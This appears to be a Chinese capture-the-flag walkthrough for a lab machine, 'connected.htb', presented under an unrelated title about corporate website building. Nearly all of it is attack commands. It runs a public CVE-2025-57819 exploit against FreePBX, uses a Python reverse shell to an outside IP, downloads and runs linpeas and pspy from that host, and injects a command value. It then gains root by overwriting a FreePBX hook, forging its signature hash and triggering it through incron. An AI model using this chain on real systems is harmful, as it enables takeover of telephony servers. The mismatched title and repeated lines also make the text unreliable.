企业官网建设流程全解析

nmap扫描

sudo nmap --top-ports 10000 10.129.10.152 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.10.152 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.10.152 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.10.152 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

详细扫描

nmap -sV -sC -p22,80,443 --min-rate=1000 {target_ip} -vv

尝试poc
https://github.com/blueisbeautiful/CVE-2025-57819.git

python watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb

webshell反连

http://connected.htb/this-is-an-ioc-not-actually-watchTowr-4l0vax36ne.php?cmd=python -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.240",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

上linpeas，没有什么发现

wget http://10.10.14.240/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

经过翻找发现了事件型的任务/etc/incron.d/sysadmin，查看文件内容

/var/spool/asterisk/incron IN_MODIFY,IN_ATTRIB,IN_CLOSE_WRITE /usr/bin/sysadmin_manager $#

该文件规定只要/var/spool/asterisk/incron/这个目录下有任何文件被修改（IN_MODIFY）、属性改变（IN_ATTRIB）或写入并关闭（IN_CLOSE_WRITE），系统就会立刻以root权限运行/usr/bin/sysadmin_manager脚本，并将发生变动的文件名（$#）作为参数传给它。所以我们进一步查看/usr/bin/sysadmin_manager`

该文件执行了system命令，且以root权限执行，所以我们追踪$hookfile $params。我们注意到hookfile有多种可能

/var/www/html/admin/modules/$module/hooks/$hook /usr/local/asterisk/$hook

我们查看哪些内容可写，发现都可写，所以我们尝试再/usr/

为具体了解程序执行逻辑，我们上pspy并尝试触发文件

wget http://10.10.14.240/pspy64 && chmod 755 pspy64 && ./pspy64

在/var/spool/asterisk/incron 创建文件

尝试payload，但没能直接执行，我们必须借助程序内容逻辑

123;chmod 7777 bash

我们进一步查看了内部逻辑，发现如下攻击手段:

#查找所有hook find /var/www/html/admin/modules/ -path "*/hooks/*" #我们使用这个hook /var/www/html/admin/modules/sysadmin/hooks/wifi-scan #修改hook cat > /var/www/html/admin/modules/sysadmin/hooks/wifi-scan << 'EOF' #!/bin/bash chmod 7777 /bin/bash EOF #创建新签名 NEW_HASH=$(sha256sum /var/www/html/admin/modules/sysadmin/hooks/wifi-scan | awk '{print $1}') #写入新签名 sed -i "s/hooks\/wifi-scan = .*/hooks\/wifi-scan = $NEW_HASH/" \ /var/www/html/admin/modules/sysadmin/module.sig #触发 touch /var/spool/asterisk/incron/sysadmin.wifi-scan

提权到root

/bin/bash -p

提权到root

/bin/bash -p